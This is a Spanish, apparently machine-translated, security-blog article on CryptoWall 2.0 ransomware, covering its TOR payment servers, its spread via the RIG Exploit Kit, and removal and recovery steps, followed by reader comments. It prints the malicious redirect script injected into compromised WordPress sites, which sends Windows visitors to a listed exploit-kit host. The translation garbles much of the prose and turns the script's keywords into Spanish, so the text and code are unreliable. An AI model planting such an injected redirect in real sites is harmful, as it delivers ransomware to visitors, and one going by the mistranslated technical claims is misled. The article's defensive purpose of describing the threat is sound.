Retire CryptoWall 2.0 y Restauración de los archivos cifrados - Cómo, Foro de Tecnología y Seguridad PC | SensorsTechForum.com
eliminan la amenaza

Retire CryptoWall 2.0 y Restauración de los archivos cifrados

Remove-CryptoWall2.0
El CryptoWall ransomware ha sido una enorme amenaza para los administradores de red y los usuarios de PC, desde que fue lanzado inicialmente, ya que cifra los datos locales, así como los datos que se encuentra en recursos compartidos de red. La nueva versión del ransomware, CryptoWall 2.0 ahora se mejora, lo que hace aún más difícil para el usuario para recuperar los archivos cifrados sin tener que pagar el rescate.

CryptoWall 2.0 – Qué hay de nuevo?

Los criminales cibernéticos utilizan sus propios portales TOR en la versión más reciente CryptoWall. Un ID de la cartera individual se envió a cada víctima por separado en lugar de los enlaces no modificables utilizados anteriormente que eran los mismos para casi todas las víctimas. También, los archivos no encriptados originales se borran de forma segura.

Propias TOR Gateways

Los servidores de pago del rescate de CyptoWall se encuentran en TOR. Esto permite a los creadores de ransomware para permanecer ocultos de las autoridades. Para que el usuario sea capaz de conectar con el servidor, que necesita para acceder a la red TOR, y la mayoría de los usuarios les resulta más difícil instalar TOR en el primer lugar. Por eso CryptoWall utiliza una puerta de enlace Web-to-TOR que permitió a las víctimas ransomware para acceder al servidor de pago fácil. A medida que los proveedores de esta pasarela se dieron cuenta de lo que estaba pasando, comenzaron a la lista negra de sus servidores de pago para que no se utilizarán con fines maliciosos. La nueva versión de CryptoWall tiene ahora sus propios servidores de pago - pay2tor.com, tor4pay.com y pay4tor.com.

Una identificación de la carpeta única para cada víctima

Los usuarios que optaron por pagar el rescate se proporcionan con un ID cartera individual que es único para cada víctima. Inicialmente, los usuarios no se presentaron con esta opción, lo que permitió a la gente a robar las operaciones de pago de otros usuarios y lo utilizan como sus propios pagos de rescate. Las direcciones únicas de pago por cada víctima esta ya no es posible.

Los archivos sin cifrar originales Se Están que se borraron

Esta es otra nueva característica para la CryptoWall 2.0. En la versión anterior, el ransomware sería cifrar archivos de datos de la víctima y luego simplemente borrar los originales. Esto hizo posible que las herramientas de recuperación de datos para recuperar la información que se cifró. Este método ya no se puede aplicar como CryptoWall 2.0 segura borra los datos de la víctima. Esto deja al usuario comprometido con sólo dos opciones: ya sea para restaurar los archivos a partir de copias de seguridad o para pagar la suma requerida.

CryptoWall 2.0 Distribuido a través de la RIG Exploit Kit

Los expertos en seguridad han observado recientemente hackers explotan enlaces de WordPress vulnerables con el fin de redirigir a los usuarios de computadoras a los servidores que alojan el RIG Exploit Kit. Las últimas abusa de un gran número de vulnerabilidades en Flash sin parchear, Java y muchas otras aplicaciones con el fin de arrastrar la nueva versión del ransomware CryptoWall. Según el blog de dynamoo, los spammers detrás de esta campaña son los mismos que distribuye el reciente mensaje de spam eFax, pero esta vez se están entregando CryptoWall 2.0 lugar. El mismo blog también revela la siguiente información:

  • hxxp://206.253.165.76:8080 es el servidor que aloja el RIG Exploit Kit.
  • hxxp://206.253.165.76:8080/ord / rot.php es el redirector explotar.
  • hxxp://206.253.165.76:8080/ord / ef.html es el correo no deseado reportado por el blog.

Los enlaces de WordPress comprometidos se sabe que contienen este código:

→guión
NombreSO var = "Sistema Operativo desconocido";
si (navigator.appVersion.indexOf("Win")!= -1) NombreSO = "Windows"; si (navigator.appVersion.indexOf("Mac")!= -1) Osname = "MacOS"; si (navigator.appVersion.indexOf("X11")!= -1) NombreSO = "UNIX"; si (navigator.appVersion.indexOf("Linux")!= -1) NombreSO = "Linux"; Var1 = 112; var2 = var1;
si(NombreSO == "Windows") {location.replace("Hxxp://206.253.165.76:8080/ord / rot.php ");}demás{location.replace("Http://google.com/search?q = efax ");}
/guión

Cómo quitar CryptoWall 2.0 y Restauración de los archivos cifrados

Primera Etapa: Retire CryptoWall 2.0

1. Lo primero y más importante - la descarga y la instalación de un escáner anti-malware legítimo y digno de confianza, que le ayudará a ejecutar un análisis completo del sistema y eliminar todas las amenazas.donload_now_250
Escáner sistema Spy Hunter sólo detectará la amenaza. Si desea que la amenaza se elimine de forma automática, usted necesita comprar la versión completa de la herramienta de software malicioso. Obtenga más información sobre la herramienta de SpyHunter Anti-Malware

2. Ejecutar una segunda exploración para asegurarse de que no hay programas de software maliciosos que se ejecutan en su PC. Para ello, se recomienda descargar ESET Online Scanner.

Su PC debe estar limpio ahora.

Segunda Etapa: Restauración de los archivos cifrados

Opción 1: Mejor de los casos - ha realizado una copia de seguridad de sus datos en una base regular, y ahora usted puede utilizar la última copia de seguridad para restaurar los archivos.

Opción 2: Trata de descifrar sus archivos con la ayuda de RectorDecryptor.exe y RakhniDecryptor.exe de Kaspersky. Ellos te pueden ayudar en el proceso, pero tenga en cuenta que no han sido diseñados especialmente para cifrar la información que fue descifrado por este ransomware particular,.

Opción 3: Instantáneas de volumen

1. Instale el Explorador de Sombra, que está disponible con Windows Vista, Ventanas 7, Ventanas 8 y Windows XP Service Pack 2.

2. Desde gota de Sombra Explorador menú desplegable elija una unidad y la última fecha en la que desea restaurar información de.

3. Haga clic derecho en un archivo cifrado aleatoria o una carpeta y seleccione "Exportar". Seleccione una ubicación para restaurar el contenido del archivo o carpeta seleccionada.

Retire CryptoWall 2.0 Automáticamente con Spy Hunter Malware – Herramienta de eliminación.

donload_now_250
Escáner Spy Hunter sólo detectará la amenaza. Si desea que la amenaza se elimine de forma automática, usted necesita comprar la versión completa de la herramienta anti-malware.Obtenga más información sobre la herramienta de SpyHunter Anti-Malware / Cómo desinstalar SpyHunter

avatar

Berta Bilbao

Berta es un investigador de malware dedicado, soñando por un espacio cibernético más seguro. Su fascinación con la seguridad que comenzó hace unos años, cuando un malware ella bloqueada fuera de su propio ordenador.

Más Mensajes

6 Comentarios

  1. avatarrelic99

    La versión actualizada se mantendrá de funcionamiento o la instalación de cualquier solución de virus, retire la unidad infectada y esclavizar a otro equipo para la digitalización. Una suscripción de pago a CryptoPrevent es la única herramienta que conozco para evitar infecciones de la v2.

    1. avatarArrendajo

      Me encontré con lo que debe haber sido una nueva variante hace apenas unos días. No podía erradicar con la máquina de las ventanas afectadas activo, así que también esclavizado la unidad infectada a una máquina que no infectada, y procedió a escanear toda la unidad con el siguiente: Malwarebytes, Hitman Pro, TDSSKiller, Avast Antivirus, y finalmente siguió con ESET. Y la infección todavía regresó tan pronto como la máquina se conecta a internet, evidentemente enganchar algún proceso de Internet Explorer para hacerlo. He podido encontrar ninguna alteración DNS, sin alteraciones archivo HOSTS, y no ganchos Winsock o BHO instalados para dar cuenta de ello. Terminé de limpiar la unidad y haciendo un restauración de fábrica. Algo que rara vez tengo que hacer para las infecciones de malware. Antes de hacer eso traté de recuperar archivos de instantáneas (Victoria 7 64bit), y ninguno estaba presente como el malware había acabado con el sistema de puntos de restauración y todas las copias de archivos de sombra. Yo por suerte pude recuperar algunos archivos que aún no habían sido cifrados, así que no fue una pérdida total. Este fue mi primer encuentro con Cryptowall, y a pesar de seguir los consejos que había encontrado en la eliminación en diversos foros de seguridad,aún así volvió por desgracia. Tuve que reconocer la derrota. Bug Nasty.

  2. avatarAyesha

    Cryptowall 2.0 es lo que me dieron me enteré de lo que se llamaba días después . Pero no elimina ? Los originales ? Como fui a buscar / como yo solía software de recuperación de la mejor fuera de aquí. Tengo el virus 11-18-2014

  3. avatarChris

    Tengo el virus en todo 11/11/2014. Al menos ese fue el día que me enteré de lo que era y apagado mi máquina y reiniciado en modo seguro después de hacer la investigación. Desde entonces he estado tratando de encontrar la manera de restaurar los archivos que fueron cifrados. Tengo 2 meses el valor de las fotos que están encriptados, pero la información no suma. Espero que alguien podría arrojar algo de luz sobre el problema. Si un archivo está cifrado entonces sería la fecha de modificación o creado sea la fecha en que se ha cifrado? He intentado utilizar Recuva y otro software para restaurar pero me dicen que no se ha eliminado. Todas las ideas?

  4. avatarHipólito González

    Hola buenos dias, mi pc fe infectada por el virus criptowall v3.0, y mis archivos fueron encriptados con la clave pùblica RSA 2048 y necesito recuperarlos, si alguien me puede ayudar se los agradecere mucho.
    Saludos
    Hipolito

    1. Milena DimitrovaMilena Dimitrova

      Hay Hipólito,

      Lamentamos oír que usted ha sido infectado con CryptoWall 2.0! Por favor, unirse a nuestro foro y leer los siguientes temas: http://sensorstechforum.com/forums/internet-and-networking-security/help-decrypt-files-encrypted-by-cryptowall-3-0/
      http://sensorstechforum.com/forums/malware-removal-questions-and-guides/how-to-remove-cryptowall-4-0-and-restore-your-data/

      Desafortunadamente, Cifrado RSA-2048 es bastante difícil de romper. Esperamos que las herramientas mencionadas en los temas ayudan a recuperar sus archivos! No dude en preguntar si usted tiene otras preguntas.

      Milena y equipo STF

Dejar un comentario

Su dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

Se agotó el tiempo límite. Vuelve a cargar de CAPTCHA.

Compartir en Facebook Compartir
Cargando ...
Compartir en Twitter Pío
Cargando ...
Compartir en Google Plus Compartir
Cargando ...
Compartir en Linkedin Compartir
Cargando ...
Compartir en Digg Compartir
Compartir en Reddit Compartir
Cargando ...
Compartir en Stumbleupon Compartir
Cargando ...